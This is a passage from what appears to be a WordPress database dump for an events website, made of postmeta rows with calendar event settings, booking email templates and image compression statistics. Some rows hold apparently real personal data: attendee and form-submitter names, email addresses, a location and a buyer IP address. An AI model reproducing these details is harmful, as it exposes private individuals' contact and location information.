ccurrences\";s:2:\"10\";}}'),(162309,266722,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(162310,266722,'mec_certain_weekdays','a:0:{}'),(162311,266722,'mec_allday','0'),(162312,266722,'one_occurrence','0'),(162313,266722,'mec_hide_time','0'),(162314,266722,'mec_hide_end_time','0'),(162315,266722,'mec_comment',''),(162316,266722,'mec_timezone','global'),(162317,266722,'mec_countdown_method','global'),(162318,266722,'mec_public','1'),(162319,266722,'mec_start_date','2022-06-10'),(162320,266722,'mec_start_time_hour','7'),(162321,266722,'mec_start_time_minutes','0'),(162322,266722,'mec_start_time_ampm','PM'),(162323,266722,'mec_start_day_seconds','68400'),(162324,266722,'mec_end_date','2022-06-10'),(162325,266722,'mec_end_time_hour','8'),(162326,266722,'mec_end_time_minutes','0'),(162327,266722,'mec_end_time_ampm','PM'),(162328,266722,'mec_end_day_seconds','72000'),(162329,266722,'mec_repeat_status','0'),(162330,266722,'mec_repeat_type',''),(162331,266722,'mec_repeat_interval','1'),(162332,266722,'mec_repeat_end',''),(162333,266722,'mec_repeat_end_at_occurrences',''),(162334,266722,'mec_repeat_end_at_date',''),(162335,266722,'mec_advanced_days','a:0:{}'),(162336,266722,'mec_in_days',''),(162337,266722,'mec_not_in_days',''),(162338,266722,'mec_hourly_schedules','a:0:{}'),(162339,266722,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(162340,266722,'mec_tickets','a:0:{}'),(162341,266722,'mec_fees_global_inheritance','1'),(162342,266722,'mec_fees','a:0:{}'),(162343,266722,'mec_ticket_variations_global_inheritance','1'),(162344,266722,'mec_ticket_variations','a:0:{}'),(162345,266722,'mec_reg_fields_global_inheritance','1'),(162346,266722,'mec_reg_fields','a:0:{}'),(162347,266722,'mec_bfixed_fields','a:0:{}'),(162348,266722,'mec_op','a:0:{}'),(162349,266722,'mec_fields','a:0:{}'),(162350,266722,'mec_event_status','EventScheduled'),(162351,266722,'mec_moved_online_link',''),(162352,266722,'mec_cancelled_reason',''),(162353,266722,'mec_display_cancellation_reason_in_single_page',''),(162354,266722,'boldgrid_hide_page_title','0'),(162355,266722,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(162356,266722,'passster_activate_global_protection',NULL),(162357,266722,'passster_activate_protection',NULL),(162358,266722,'passster_protection_type','password'),(162361,266722,'_dp_original','266104'),(162360,266722,'boldgrid_in_page_containers','1'),(162362,266722,'_edit_lock','1653588389:2'),(162363,266722,'_edit_last','2'),(162366,266722,'_thumbnail_id','266723'),(162367,266723,'original-file','2022/05/hilltop-joy-updraft-pre-smush-original.jpg'),(162368,266723,'smush-complete','1'),(162369,266723,'smush-info','The file was compressed from 58.72 KB to 56.33 KB saving 4.07 percent using WP-Optimize'),(162370,266723,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:60133;s:12:\"smushed-size\";i:57684;s:15:\"savings-percent\";d:4.07;s:10:\"sizes-info\";a:7:{s:4:\"full\";a:2:{s:8:\"original\";i:60133;s:10:\"compressed\";i:57684;}s:6:\"medium\";a:2:{s:8:\"original\";i:11269;s:10:\"compressed\";i:11247;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:6191;s:10:\"compressed\";i:6125;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:18798;s:10:\"compressed\";i:18589;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:29504;s:10:\"compressed\";i:29063;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:21111;s:10:\"compressed\";i:20836;}s:8:\"tileview\";a:2:{s:8:\"original\";i:24177;s:10:\"compressed\";i:23753;}}}'),(162371,266725,'protect_children',''),(162372,266725,'mec_color',''),(162373,266725,'mec_location_id','118'),(162374,266725,'mec_dont_show_map','0'),(162375,266725,'mec_organizer_id','1'),(162376,266725,'mec_read_more',''),(162377,266725,'mec_more_info',''),(162378,266725,'mec_more_info_title',''),(162379,266725,'mec_more_info_target','_self'),(162380,266725,'mec_cost',''),(162381,266725,'mec_currency','a:0:{}'),(162382,266725,'mec_additional_organizer_ids','a:0:{}'),(162383,266725,'mec_additional_location_ids','a:0:{}'),(162384,266725,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-06-20\";s:4:\"hour\";s:1:\"3\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-06-20\";s:4:\"hour\";s:1:\"4\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(162385,266725,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(162386,266725,'mec_certain_weekdays','a:0:{}'),(162387,266725,'mec_allday','0'),(162388,266725,'one_occurrence','0'),(162389,266725,'mec_hide_time','0'),(162390,266725,'mec_hide_end_time','0'),(162391,266725,'mec_comment',''),(162392,266725,'mec_timezone','global'),(162393,266725,'mec_countdown_method','global'),(162394,266725,'mec_public','1'),(162395,266725,'mec_start_date','2022-06-20'),(162396,266725,'mec_start_time_hour','3'),(162397,266725,'mec_start_time_minutes','0'),(162398,266725,'mec_start_time_ampm','PM'),(162399,266725,'mec_start_day_seconds','54000'),(162400,266725,'mec_end_date','2022-06-20'),(162401,266725,'mec_end_time_hour','4'),(162402,266725,'mec_end_time_minutes','0'),(162403,266725,'mec_end_time_ampm','PM'),(162404,266725,'mec_end_day_seconds','57600'),(162405,266725,'mec_repeat_status','0'),(162406,266725,'mec_repeat_type',''),(162407,266725,'mec_repeat_interval','1'),(162408,266725,'mec_repeat_end',''),(162409,266725,'mec_repeat_end_at_occurrences',''),(162410,266725,'mec_repeat_end_at_date',''),(162411,266725,'mec_advanced_days','a:0:{}'),(162412,266725,'mec_in_days',''),(162413,266725,'mec_not_in_days',''),(162414,266725,'mec_hourly_schedules','a:0:{}'),(162415,266725,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(162416,266725,'mec_tickets','a:0:{}'),(162417,266725,'mec_fees_global_inheritance','1'),(162418,266725,'mec_fees','a:0:{}'),(162419,266725,'mec_ticket_variations_global_inheritance','1'),(162420,266725,'mec_ticket_variations','a:0:{}'),(162421,266725,'mec_reg_fields_global_inheritance','1'),(162422,266725,'mec_reg_fields','a:0:{}'),(162423,266725,'mec_bfixed_fields','a:0:{}'),(162424,266725,'mec_op','a:0:{}'),(162425,266725,'mec_fields','a:0:{}'),(162426,266725,'mec_event_status','EventScheduled'),(162427,266725,'mec_moved_online_link',''),(162428,266725,'mec_cancelled_reason',''),(162429,266725,'mec_display_cancellation_reason_in_single_page',''),(162430,266725,'boldgrid_hide_page_title','0'),(162431,266725,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(162432,266725,'passster_activate_global_protection',NULL),(162433,266725,'passster_activate_protection',NULL),(162434,266725,'passster_protection_type','password'),(162437,266725,'_dp_original','266104'),(162436,266725,'boldgrid_in_page_containers','1'),(162438,266725,'_edit_lock','1653589693:2'),(162439,266725,'_edit_last','2'),(162440,266726,'_wp_attached_file','2022/05/surfing-1.jpg'),(162441,266726,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:694;s:6:\"height\";i:390;s:4:\"file\";s:21:\"2022/05/surfing-1.jpg\";s:8:\"filesize\";i:48483;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:21:\"surfing-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11889;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:21:\"surfing-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5981;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:21:\"surfing-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16659;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:21:\"surfing-1-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26837;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:21:\"surfing-1-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19567;}s:8:\"tileview\";a:5:{s:4:\"file\";s:21:\"surfing-1-300x390.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:390;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19991;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(162442,266726,'original-file','2022/05/surfing-1-updraft-pre-smush-original.jpg'),(162443,266726,'smush-complete','1'),(162444,266726,'smush-info','The file was compressed from 47.35 KB to 46.42 KB saving 1.97 percent using WP-Optimize'),(162445,266726,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:48483;s:12:\"smushed-size\";i:47529;s:15:\"savings-percent\";d:1.97;s:10:\"sizes-info\";a:7:{s:4:\"full\";a:2:{s:8:\"original\";i:48483;s:10:\"compressed\";i:47529;}s:6:\"medium\";a:2:{s:8:\"original\";i:11889;s:10:\"compressed\";i:11889;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:5981;s:10:\"compressed\";i:5915;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:16659;s:10:\"compressed\";i:16659;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:26837;s:10:\"compressed\";i:26776;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:19567;s:10:\"compressed\";i:19531;}s:8:\"tileview\";a:2:{s:8:\"original\";i:19991;s:10:\"compressed\";i:19991;}}}'),(162446,266725,'_thumbnail_id','266726'),(162447,266728,'protect_children',''),(162448,266728,'mec_color',''),(162449,266728,'mec_location_id','118'),(162450,266728,'mec_dont_show_map','0'),(162451,266728,'mec_organizer_id','1'),(162452,266728,'mec_read_more',''),(162453,266728,'mec_more_info',''),(162454,266728,'mec_more_info_title',''),(162455,266728,'mec_more_info_target','_self'),(162456,266728,'mec_cost',''),(162457,266728,'mec_currency','a:0:{}'),(162458,266728,'mec_additional_organizer_ids','a:0:{}'),(162459,266728,'mec_additional_location_ids','a:0:{}'),(162460,266728,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-06-27\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-06-27\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(162461,266728,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(162462,266728,'mec_certain_weekdays','a:0:{}'),(162463,266728,'mec_allday','0'),(162464,266728,'one_occurrence','0'),(162465,266728,'mec_hide_time','0'),(162466,266728,'mec_hide_end_time','0'),(162467,266728,'mec_comment',''),(162468,266728,'mec_timezone','global'),(162469,266728,'mec_countdown_method','global'),(162470,266728,'mec_public','1'),(162471,266728,'mec_start_date','2022-06-27'),(162472,266728,'mec_start_time_hour','7'),(162473,266728,'mec_start_time_minutes','0'),(162474,266728,'mec_start_time_ampm','PM'),(162475,266728,'mec_start_day_seconds','68400'),(162476,266728,'mec_end_date','2022-06-27'),(162477,266728,'mec_end_time_hour','8'),(162478,266728,'mec_end_time_minutes','0'),(162479,266728,'mec_end_time_ampm','PM'),(162480,266728,'mec_end_day_seconds','72000'),(162481,266728,'mec_repeat_status','0'),(162482,266728,'mec_repeat_type',''),(162483,266728,'mec_repeat_interval','1'),(162484,266728,'mec_repeat_end',''),(162485,266728,'mec_repeat_end_at_occurrences',''),(162486,266728,'mec_repeat_end_at_date',''),(162487,266728,'mec_advanced_days','a:0:{}'),(162488,266728,'mec_in_days',''),(162489,266728,'mec_not_in_days',''),(162490,266728,'mec_hourly_schedules','a:0:{}'),(162491,266728,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(162492,266728,'mec_tickets','a:0:{}'),(162493,266728,'mec_fees_global_inheritance','1'),(162494,266728,'mec_fees','a:0:{}'),(162495,266728,'mec_ticket_variations_global_inheritance','1'),(162496,266728,'mec_ticket_variations','a:0:{}'),(162497,266728,'mec_reg_fields_global_inheritance','1'),(162498,266728,'mec_reg_fields','a:0:{}'),(162499,266728,'mec_bfixed_fields','a:0:{}'),(162500,266728,'mec_op','a:0:{}'),(162501,266728,'mec_fields','a:0:{}'),(162502,266728,'mec_event_status','EventScheduled'),(162503,266728,'mec_moved_online_link',''),(162504,266728,'mec_cancelled_reason',''),(162505,266728,'mec_display_cancellation_reason_in_single_page',''),(162506,266728,'boldgrid_hide_page_title','0'),(162507,266728,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(162508,266728,'passster_activate_global_protection',NULL),(162509,266728,'passster_activate_protection',NULL),(162510,266728,'passster_protection_type','password'),(162511,266728,'boldgrid_in_page_containers','1'),(162514,266728,'_dp_original','266725'),(162513,266728,'_thumbnail_id','266726'),(162515,266728,'_edit_lock','1653589934:2'),(162516,266728,'_edit_last','2'),(162551,247344,'_wp_old_date','2022-02-18'),(162555,247345,'_wp_old_date','2022-02-18'),(177221,267955,'mec_book_date_submit','20230212111808'),(162565,247332,'_wp_old_date','2022-02-18'),(162567,266281,'_wp_old_date','2022-02-18'),(179386,268208,'mec_end_day_seconds','46800'),(179331,268202,'_wp_attached_file','2023/03/meetup-wide-2.png'),(179334,268202,'smush-complete','1'),(179335,268202,'smush-info','The file was compressed from 209.31 KB to 66.69 KB saving 68.14 percent using WP-Optimize'),(179336,268202,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:214329;s:12:\"smushed-size\";i:68290;s:15:\"savings-percent\";d:68.14;s:10:\"sizes-info\";a:6:{s:4:\"full\";a:2:{s:8:\"original\";i:214329;s:10:\"compressed\";i:68290;}s:6:\"medium\";a:2:{s:8:\"original\";i:63916;s:10:\"compressed\";i:21120;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:36918;s:10:\"compressed\";i:13300;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:105442;s:10:\"compressed\";i:38612;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:164061;s:10:\"compressed\";i:58680;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:136366;s:10:\"compressed\";i:49536;}}}'),(163448,266764,'mec_more_info_target','_self'),(163447,266764,'mec_more_info_title',''),(163446,266764,'mec_more_info',''),(163445,266764,'mec_read_more',''),(163444,266764,'mec_organizer_id','1'),(163437,266763,'mec_price','0'),(163438,266763,'mec_gateway','MEC_gateway_free'),(163439,266763,'mec_gateway_label','Free'),(163440,266764,'protect_children',''),(163441,266764,'mec_color',''),(163442,266764,'mec_location_id','118'),(163443,266764,'mec_dont_show_map','0'),(163436,266763,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:20:\"joanna3064@gmail.com\";s:4:\"name\";s:14:\"Joanne Milelli\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:11:\"47.42.34.99\";}}'),(163435,266763,'mec_ticket_price_1','0'),(163434,266763,'mec_booking_location','129'),(163433,266763,'mec_book_date_submit','20220603073620'),(163432,266763,'mec_attention_time_end','1655076600'),(163431,266763,'mec_attention_time_start','1655029800'),(163430,266763,'mec_attention_time','1655029800:1655076600'),(163429,266763,'mec_other_dates','a:0:{}'),(163428,266763,'mec_all_dates','a:0:{}'),(163427,266763,'mec_booking_time','2022-06-03 07:36:20'),(163426,266763,'mec_ticket_id',',1,'),(163425,266763,'mec_date','1655029800:1655076600'),(163424,266763,'mec_event_id','266715'),(163423,266763,'mec_confirmed','1'),(163422,266763,'mec_cancellation_key','c7a26cdce1b89f56c164a8edaa170737'),(163421,266763,'mec_verification_key','1906210b5e5041e98e648b2db023f728'),(163420,266763,'mec_verified','1'),(163419,266763,'mec_user_id','1000020'),(163369,266761,'_menu_item_xfn',''),(163370,266761,'_menu_item_url','https://eckankar-colorado.org/contact-us/'),(179315,266761,'_menu_sgpb_popup_id','0'),(163406,266692,'_edit_lock','1654109901:2'),(163407,266762,'_field_496','Tom'),(163408,266762,'_field_497','Ramar'),(163409,266762,'_field_498',''),(163410,266762,'_field_499','tom.ramar@gmail.com'),(163411,266762,'_field_500',''),(163412,266762,'_field_501','Broomfield'),(163413,266762,'_field_502','CO'),(163414,266762,'_field_503','US'),(163415,266762,'_field_505',''),(163416,266762,'_form_id','53'),(163417,266762,'_seq_num','5'),(163418,266763,'mec_transaction_id','JND22470'),(163368,266761,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(163367,266761,'_menu_item_target',''),(163366,266761,'_menu_item_object','custom'),(163365,266761,'_menu_item_object_id','266761'),(163364,266761,'_menu_item_menu_item_parent','247332'),(163363,266761,'_menu_item_type','custom'),(179333,268202,'original-file','2023/03/meetup-wide-2-updraft-pre-smush-original.png'),(162798,266734,'_wp_attached_file','2022/05/CelebrateLife.webp'),(162799,266734,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:676;s:6:\"height\";i:380;s:4:\"file\";s:26:\"2022/05/CelebrateLife.webp\";s:8:\"filesize\";i:10830;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:26:\"CelebrateLife-300x169.webp\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:5492;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:26:\"CelebrateLife-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:3738;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:26:\"CelebrateLife-300x300.webp\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:7922;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:26:\"CelebrateLife-474x324.webp\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:10790;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:26:\"CelebrateLife-391x260.webp\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:8316;}s:8:\"tileview\";a:5:{s:4:\"file\";s:26:\"CelebrateLife-300x380.webp\";s:5:\"width\";i:300;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:8656;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(162869,266734,'smush-info','Failed with error code invalid_file_type - /home/eckank5/public_html/wp-content/uploads/2022/05/CelebrateLife.webp - cannot be optimized, it has an invalid file type'),(162870,266734,'smush-complete',''),(162873,266736,'_wp_attached_file','2022/05/SurfsUp.webp'),(162874,266736,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:676;s:6:\"height\";i:380;s:4:\"file\";s:20:\"2022/05/SurfsUp.webp\";s:8:\"filesize\";i:16806;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"SurfsUp-300x169.webp\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:7564;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"SurfsUp-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:3952;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:20:\"SurfsUp-300x300.webp\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:9516;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:20:\"SurfsUp-474x324.webp\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:15530;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:20:\"SurfsUp-391x260.webp\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:11860;}s:8:\"tileview\";a:5:{s:4:\"file\";s:20:\"SurfsUp-300x380.webp\";s:5:\"width\";i:300;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:9968;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(162875,266736,'smush-info','Failed with error code invalid_file_type - /home/eckank5/public_html/wp-content/uploads/2022/05/SurfsUp.webp - cannot be optimized, it has an invalid file 